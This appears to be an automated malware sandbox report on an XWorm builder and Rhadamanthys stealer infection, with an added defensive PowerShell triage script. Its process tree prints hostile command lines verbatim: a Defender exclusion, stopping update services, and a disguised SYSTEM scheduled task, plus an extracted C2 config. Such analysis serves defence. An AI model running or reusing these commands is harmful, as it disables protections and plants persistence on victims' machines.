Analysis
max time kernel: 666s
max time network: 669s
platform: windows10-2004_x64
resource: win10v2004-20230703-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230703-en, locale:en-us, os:windows10-2004-x64, system
submitted: 16/07/2023, 21:46
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: https://github.com
Resource: win10v2004-20230703-en

General
Target: https://github.com
Malware Config
Extracted: https://pastebin.com/raw/zaCgrR02
Extracted: xworm
127.0.0.1:7000
ekJu4BRO6KRPlNHF
install_file: USB.exe

Signatures
Detect rhadamanthys stealer shellcode 2 IoCs
resource | yara_rule
behavioral1/memory/3484-1965-0x0000000002270000-0x0000000002670000-memory.dmp | family_rhadamanthys
behavioral1/memory/3484-1967-0x0000000002270000-0x0000000002670000-memory.dmp | family_rhadamanthys
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
description | pid | Process | procid_target
PID 440 created 4136 | 440 | nefeczio.0j41.exe | 178
PID 440 created 4136 | 440 | nefeczio.0j41.exe | 178
PID 440 created 4136 | 440 | nefeczio.0j41.exe | 178
PID 440 created 4136 | 440 | nefeczio.0j41.exe | 178
PID 440 created 4136 | 440 | nefeczio.0j41.exe | 178
PID 3484 created 4136 | 3484 | nefeczio.0j42.exe | 178
Blocklisted process makes network request 2 IoCs
flow | pid | Process
236 | 2452 | powershell.exe
238 | 2452 | powershell.exe
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs
description | ioc | Process
File created | C:\Windows\System32\drivers\etc\hosts | nefeczio.0j41.exe
Modifies Installed Components in the registry 2 TTPs 2 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Active Setup\Installed Components | explorer.exe
Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Active Setup\Installed Components | explorer.exe
Stops running service(s) 3 TTPs
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | win-xworm-builder.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | wsappx.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | XWorm.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | rundll32.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | AtlsWare.exe
Executes dropped EXE 11 IoCs
pid | Process
1668 | win-xworm-builder.exe
4928 | builder.exe
2576 | wsappx.exe
1556 | builder.exe
3596 | XWorm.exe
1172 | XWorm V3.1.exe
4868 | AtlsWare.exe
1096 | nefeczio.0j40.exe
440 | nefeczio.0j41.exe
3484 | nefeczio.0j42.exe
3512 | nefeczio.0j43.exe
Loads dropped DLL 1 IoCs
pid | Process
1512 | XHVNC.exe
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource | yara_rule
behavioral1/memory/1512-935-0x0000000005F50000-0x0000000006174000-memory.dmp | agile_net
Uses the VBS compiler for execution 1 TTPs
Adds Run key to start application 2 TTPs 3 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Windows\CurrentVersion\Run | chrome.exe
Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Windows\CurrentVersion\Run | nefeczio.0j40.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsHostProcessor = "\"C:\\Users\\Admin\\AppData\\Roaming\\WindowsHostProcessor\\WindowsHostProcessor.exe\" " | nefeczio.0j40.exe
Enumerates connected drives 3 TTPs 5 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description | ioc | Process
File opened (read-only) | \??\D: | XWorm.exe
File opened (read-only) | \??\D: | explorer.exe
File opened (read-only) | \??\F: | explorer.exe
File opened (read-only) | \??\D: | explorer.exe
File opened (read-only) | \??\F: | explorer.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
136 | ip-api.com
Drops file in System32 directory 3 IoCs
description | ioc | Process
File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | powershell.exe
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | svchost.exe
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | svchost.exe
Suspicious use of SetThreadContext 1 IoCs
description | pid | Process | procid_target
PID 440 set thread context of 2544 | 440 | nefeczio.0j41.exe | 243
Launches sc.exe 5 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | Process
1972 | sc.exe
3880 | sc.exe
640 | sc.exe
3704 | sc.exe
2520 | sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 15 IoCs
pid | pid_target | Process | procid_target
4560 | 3724 | WerFault.exe | 125
3388 | 2576 | WerFault.exe | 140
3408 | 2920 | WerFault.exe | 165
2656 | 3848 | WerFault.exe | 169
4732 | 2100 | WerFault.exe | 187
3488 | 3596 | WerFault.exe | 190
404 | 772 | WerFault.exe | 193
1816 | 3568 | WerFault.exe | 196
2024 | 2868 | WerFault.exe | 199
1604 | 632 | WerFault.exe | 3
4872 | 688 | WerFault.exe | 1
4604 | 2736 | WerFault.exe | 68
2756 | 3576 | WerFault.exe | 61
1976 | 5020 | WerFault.exe | 45
2584 | 3048 | WerFault.exe | 222
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | taskmgr.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | taskmgr.exe
Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | builder.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | builder.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
2388 | schtasks.exe
1108 | schtasks.exe
Delays execution with timeout.exe 1 IoCs
pid | Process
3412 | timeout.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid | Process
4160 | tasklist.exe
Enumerates system info in registry 2 TTPs 3 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Kills process with taskkill 1 IoCs
pid | Process
4192 | taskkill.exe
Modifies Control Panel 1 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\Colors | rundll32.exe
Modifies data under HKEY_USERS 2 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | chrome.exe
Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133340175960555971" | chrome.exe
Modifies registry class 64 IoCs
\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" builder.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Mode = "6" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4\0\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff builder.exe Set value (data) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (int) 
\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" SearchApp.exe -
Suspicious behavior: AddClipboardFormatListener 5 IoCs
pid Process (×N = N consecutive identical rows)
2920 explorer.exe
4136 explorer.exe (×4)
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process (in order; ×N = N consecutive identical rows)
3172 chrome.exe (×2)
2176 chrome.exe (×2)
2576 wsappx.exe (×5)
2124 taskmgr.exe (×4)
2576 wsappx.exe
2124 taskmgr.exe (×10)
4928 builder.exe (×6)
2124 taskmgr.exe (×5)
4928 builder.exe (×4)
2124 taskmgr.exe
4928 builder.exe (×18)
2124 taskmgr.exe (×6)
Suspicious behavior: GetForegroundWindowSpam 5 IoCs
pid Process
4928 builder.exe
1512 XHVNC.exe
4136 explorer.exe
3676 taskmgr.exe
1172 XWorm V3.1.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
pid Process (×N = N identical rows)
3172 chrome.exe (×9)
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process (the two rows alternate, 32 times each)
Token: SeShutdownPrivilege 3172 chrome.exe (×32)
Token: SeCreatePagefilePrivilege 3172 chrome.exe (×32)
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process (×N = N identical rows)
3172 chrome.exe (×64)
Suspicious use of SendNotifyMessage 64 IoCs
pid Process (in order; ×N = N consecutive identical rows)
3172 chrome.exe (×32)
2124 taskmgr.exe (×24)
4928 builder.exe
2124 taskmgr.exe (×7)
Suspicious use of SetWindowsHookEx 26 IoCs
pid Process (in order; ×N = N consecutive identical rows)
2576 wsappx.exe
1512 XHVNC.exe (×2)
4928 builder.exe
2920 explorer.exe (×2)
2796 StartMenuExperienceHost.exe
3640 StartMenuExperienceHost.exe
3848 rundll32.exe
2100 SearchApp.exe
4136 explorer.exe
3596 SearchApp.exe
772 SearchApp.exe
3568 SearchApp.exe
2868 SearchApp.exe
4136 explorer.exe (×8)
4868 AtlsWare.exe
4136 explorer.exe
4136 Process not Found
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3172 wrote to memory of 3000 3172 chrome.exe 84 PID 3172 wrote to memory of 3000 3172 chrome.exe 84 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 
chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 4540 3172 chrome.exe 88 PID 3172 wrote to memory of 4540 3172 chrome.exe 88 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
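The scheduled-task persistence described above, together with the Defender exclusion, the five 'sc stop' calls, the hosts-file write and the powercfg changes that the sample spawned as children of explorer.exe (PID 4136) in the process tree below, can be checked for on a suspect host. The PowerShell below is an added example; it is not part of this sandbox report and not code from the sample. The task name, the launched path and the service list are taken from the process tree. The "SYSTEM task with an unsigned action" and "whole-tree exclusion" heuristics, the 24-hour event window and the 7-day hosts-file age are this example's own choices, and it assumes an elevated Windows PowerShell session on a Windows 10 host with the Defender and ScheduledTasks modules available.

```powershell
# Added example, not part of the sandbox report: triage a live host for the
# persistence and defence-evasion chain the sample ran out of explorer.exe.
# Assumed, not stated by the report: an elevated Windows PowerShell 5.1+ session
# on the suspect Windows 10 host with the Defender and ScheduledTasks modules.
#Requires -RunAsAdministrator

# Artifacts copied from the process tree: task name, launched path, and the
# five services passed to 'sc stop'.
$TaskName    = 'GoogleUpdateTaskMachineTCP'
$DroppedExe  = 'C:\Program Files\Google\Chrome\updatestarter.exe'
$StoppedSvcs = 'UsoSvc', 'WaaSMedicSvc', 'wuauserv', 'bits', 'dosvc'
# Roots that make a Defender exclusion a blanket one (the sample excluded the
# first two). Treating these as "broad" is this script's own heuristic.
$BroadRoots  = @(@($env:UserProfile, $env:ProgramFiles, ${env:ProgramFiles(x86)}, "$env:SystemDrive\") |
    Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\') })

function New-Finding([string]$Check, [string]$Detail) {
    [pscustomobject]@{ Check = $Check; Detail = $Detail }
}

function Test-ScheduledTaskPersistence {
    # The sample registered a SYSTEM / RunLevel Highest task launching a freshly
    # dropped binary. Report the known name, plus any SYSTEM+Highest task whose
    # executable carries no valid Authenticode signature.
    foreach ($task in Get-ScheduledTask) {
        $isSystem = $task.Principal.UserId -match '^(NT AUTHORITY\\)?SYSTEM$|^S-1-5-18$'
        $isHigh   = $task.Principal.RunLevel -eq 'Highest'
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # COM-handler actions have no Execute
            $exe    = [Environment]::ExpandEnvironmentVariables($action.Execute.Trim('"'))
            $signed = $false
            if (Test-Path -LiteralPath $exe) { $signed = (Get-AuthenticodeSignature -FilePath $exe).Status -eq 'Valid' }
            if ($task.TaskName -eq $TaskName -or ($isSystem -and $isHigh -and -not $signed)) {
                New-Finding 'ScheduledTask' ('{0}{1} -> {2} (user={3}, runlevel={4}, validSignature={5})' -f $task.TaskPath, $task.TaskName, $exe, $task.Principal.UserId, $task.Principal.RunLevel, $signed)
            }
        }
    }
}

function Test-DefenderExclusions {
    # Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles)
    # blinds Defender to everything dropped under those trees afterwards.
    $prefs = Get-MpPreference -ErrorAction SilentlyContinue
    foreach ($path in @($prefs.ExclusionPath)) {
        if ($path -and $BroadRoots -contains $path.TrimEnd('\')) {
            New-Finding 'DefenderExclusion' ('Whole-tree exclusion: {0}' -f $path)
        }
    }
}

function Test-UpdateServiceStops {
    # All five services are demand-start on a clean Windows 10, so "not running"
    # alone proves little. The 'sc stop' calls do leave Service Control Manager
    # 7036 "entered the stopped state" events; look for those in the last 24 h.
    $display = @{}
    Get-Service -Name $StoppedSvcs -ErrorAction SilentlyContinue | ForEach-Object { $display[$_.DisplayName] = $_.Name }
    $filter = @{ LogName = 'System'; ProviderName = 'Service Control Manager'; Id = 7036; StartTime = (Get-Date).AddHours(-24) }
    foreach ($ev in @(Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)) {
        $svc   = [string]$ev.Properties[0].Value   # param1: service display name
        $state = [string]$ev.Properties[1].Value   # param2: "stopped" / "running"
        if ($display.ContainsKey($svc) -and $state -eq 'stopped') {
            New-Finding 'ServiceStopped' ('{0} ({1}) stopped at {2}' -f $display[$svc], $svc, $ev.TimeCreated)
        }
    }
}

function Test-HostsFile {
    # nefeczio.0j41.exe wrote C:\Windows\System32\drivers\etc\hosts; a rewritten
    # hosts file usually pins AV or update domains to 0.0.0.0 or 127.0.0.1.
    $path = Join-Path $env:SystemRoot 'System32\drivers\etc\hosts'
    $item = Get-Item -LiteralPath $path -ErrorAction SilentlyContinue
    if (-not $item) { return }
    $active = @(Get-Content -LiteralPath $path | Where-Object { $_ -match '^\s*[^#\s]' })
    if ($active.Count -gt 0 -or $item.LastWriteTime -gt (Get-Date).AddDays(-7)) {
        New-Finding 'HostsFile' ('{0} active entries, last written {1}: {2}' -f $active.Count, $item.LastWriteTime, ($active -join '; '))
    }
}

function Test-DroppedBinary {
    if (Test-Path -LiteralPath $DroppedExe) {
        $hash = (Get-FileHash -LiteralPath $DroppedExe -Algorithm SHA256).Hash
        $sig  = (Get-AuthenticodeSignature -FilePath $DroppedExe).Status
        New-Finding 'DroppedBinary' ('{0} present, SHA256={1}, signature={2}' -f $DroppedExe, $hash, $sig)
    }
}

function Test-PowerTimeouts {
    # powercfg /x -standby-timeout-* 0 and -hibernate-timeout-* 0 keep the host
    # awake; 0 means "never". Desktops often ship with hibernate at 0 already,
    # so compare against a clean image of the same build.
    foreach ($setting in 'STANDBYIDLE', 'HIBERNATEIDLE') {
        $out = (& powercfg.exe /q SCHEME_CURRENT SUB_SLEEP $setting 2>$null) -join "`n"
        foreach ($m in [regex]::Matches($out, 'Current (AC|DC) Power Setting Index: 0x([0-9A-Fa-f]+)')) {
            if ([Convert]::ToInt64($m.Groups[2].Value, 16) -eq 0) {
                New-Finding 'PowerTimeout' ('{0} on {1} is 0 (never)' -f $setting, $m.Groups[1].Value)
            }
        }
    }
}

function Invoke-HostTriage {
    @(Test-ScheduledTaskPersistence) + @(Test-DefenderExclusions) + @(Test-UpdateServiceStops) + @(Test-HostsFile) + @(Test-DroppedBinary) + @(Test-PowerTimeouts)
}

Invoke-HostTriage | Format-Table -AutoSize -Wrap
```

Run it from an elevated prompt on the host itself; the service and power checks are baseline-dependent, so on a fleet compare the output against a clean image of the same build rather than treating any single line as proof of compromise. The scheduled-task and Defender-exclusion findings are the strong ones: a SYSTEM task pointing at an unsigned file under C:\Program Files\Google\Chrome\ and a whole-profile exclusion have no benign explanation on a managed workstation.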
Processes

Indentation shows parent/child; "cmdline:" is given where it differs from the image path.

C:\Windows\system32\lsass.exe  [PID 688]
  C:\Windows\system32\WerFault.exe  [PID 4872]
    cmdline: C:\Windows\system32\WerFault.exe -u -p 688 -s 3496
    - Program crash

C:\Windows\system32\winlogon.exe  [PID 632]
  cmdline: winlogon.exe
  C:\Windows\system32\dwm.exe  [PID 384]
    cmdline: "dwm.exe"
  C:\Windows\explorer.exe  [PID 4136]
    cmdline: explorer.exe
    - Modifies Installed Components in the registry
    - Enumerates connected drives
    - Checks SCSI registry key(s)
    - Modifies Internet Explorer settings
    - Modifies registry class
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    C:\Windows\system32\taskmgr.exe  [PID 3676]
      cmdline: "C:\Windows\system32\taskmgr.exe" /4
      - Checks processor information in registry
      - Suspicious behavior: GetForegroundWindowSpam
    C:\Program Files\7-Zip\7zG.exe  [PID 3464]
      cmdline: "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\New folder\" -an -ai#7zMap19790:98:7zEvent20048
    C:\Users\Admin\Desktop\New folder\XWorm V3.1.exe  [PID 1172]
      cmdline: "C:\Users\Admin\Desktop\New folder\XWorm V3.1.exe"
      - Executes dropped EXE
      - Suspicious behavior: GetForegroundWindowSpam
    C:\Windows\system32\taskmgr.exe  [PID 5060]
      cmdline: "C:\Windows\system32\taskmgr.exe" /4
    C:\Windows\system32\taskmgr.exe  [PID 3048]
      cmdline: "C:\Windows\system32\taskmgr.exe" /4
      - Checks SCSI registry key(s)
      C:\Windows\system32\WerFault.exe  [PID 2584]
        cmdline: C:\Windows\system32\WerFault.exe -u -p 3048 -s 2408
        - Program crash
    C:\Users\Admin\Desktop\AtlsWare.exe  [PID 4868]
      cmdline: "C:\Users\Admin\Desktop\AtlsWare.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  [PID 2452]
        cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
        - Blocklisted process makes network request
        C:\Users\Admin\AppData\Local\Temp\nefeczio.0j40.exe  [PID 1096]
          cmdline: "C:\Users\Admin\AppData\Local\Temp\nefeczio.0j40.exe"
          - Executes dropped EXE
          - Adds Run key to start application
        C:\Users\Admin\AppData\Local\Temp\nefeczio.0j41.exe  [PID 440]
          cmdline: "C:\Users\Admin\AppData\Local\Temp\nefeczio.0j41.exe"
          - Suspicious use of NtCreateUserProcessOtherParentProcess
          - Drops file in Drivers directory
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
        C:\Users\Admin\AppData\Local\Temp\nefeczio.0j42.exe  [PID 3484]
          cmdline: "C:\Users\Admin\AppData\Local\Temp\nefeczio.0j42.exe"
          - Suspicious use of NtCreateUserProcessOtherParentProcess
          - Executes dropped EXE
        C:\Users\Admin\AppData\Local\Temp\nefeczio.0j43.exe  [PID 3512]
          cmdline: "C:\Users\Admin\AppData\Local\Temp\nefeczio.0j43.exe"
          - Executes dropped EXE
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [PID 2124]
      cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    C:\Windows\System32\cmd.exe  [PID 3140]
      cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
      C:\Windows\System32\sc.exe  [PID 640]
        cmdline: sc stop UsoSvc
        - Launches sc.exe
      C:\Windows\System32\sc.exe  [PID 3704]
        cmdline: sc stop WaaSMedicSvc
        - Launches sc.exe
      C:\Windows\System32\sc.exe  [PID 2520]
        cmdline: sc stop wuauserv
        - Launches sc.exe
      C:\Windows\System32\sc.exe  [PID 1972]
        cmdline: sc stop bits
        - Launches sc.exe
      C:\Windows\System32\sc.exe  [PID 3880]
        cmdline: sc stop dosvc
        - Launches sc.exe
    C:\Windows\System32\cmd.exe  [PID 3180]
      cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      C:\Windows\System32\powercfg.exe  [PID 2772]
        cmdline: powercfg /x -hibernate-timeout-ac 0
      C:\Windows\System32\powercfg.exe  [PID 772]
        cmdline: powercfg /x -hibernate-timeout-dc 0
      C:\Windows\System32\powercfg.exe  [PID 3668]
        cmdline: powercfg /x -standby-timeout-ac 0
      C:\Windows\System32\powercfg.exe  [PID 3468]
        cmdline: powercfg /x -standby-timeout-dc 0
    C:\Windows\System32\dialer.exe  [PID 2544]
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [PID 3844]
      cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fratkkd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineTCP' /tr '''C:\Program Files\Google\Chrome\updatestarter.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updatestarter.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineTCP' -User 'System' -RunLevel 'Highest' -Force; }
      - Drops file in System32 directory
    C:\Windows\system32\certreq.exe  [PID 3448]
      cmdline: "C:\Windows\system32\certreq.exe"
    C:\Windows\System32\schtasks.exe  [PID 1856]
      cmdline: C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineTCP"
  C:\Windows\system32\WerFault.exe  [PID 1604]
    cmdline: C:\Windows\system32\WerFault.exe -u -p 632 -s 836
    - Program crash

C:\Windows\system32\svchost.exe  [PID 972]
  cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\svchost.exe  [PID 1064]
  cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\System32\svchost.exe  [PID 1032]
  cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\System32\svchost.exe  [PID 1188]
  cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
  - Drops file in System32 directory

C:\Windows\system32\svchost.exe  [PID 1324]
  cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe  [PID 1284]
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe  [PID 1176]
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
  C:\Windows\system32\taskhostw.exe  [PID 2736]
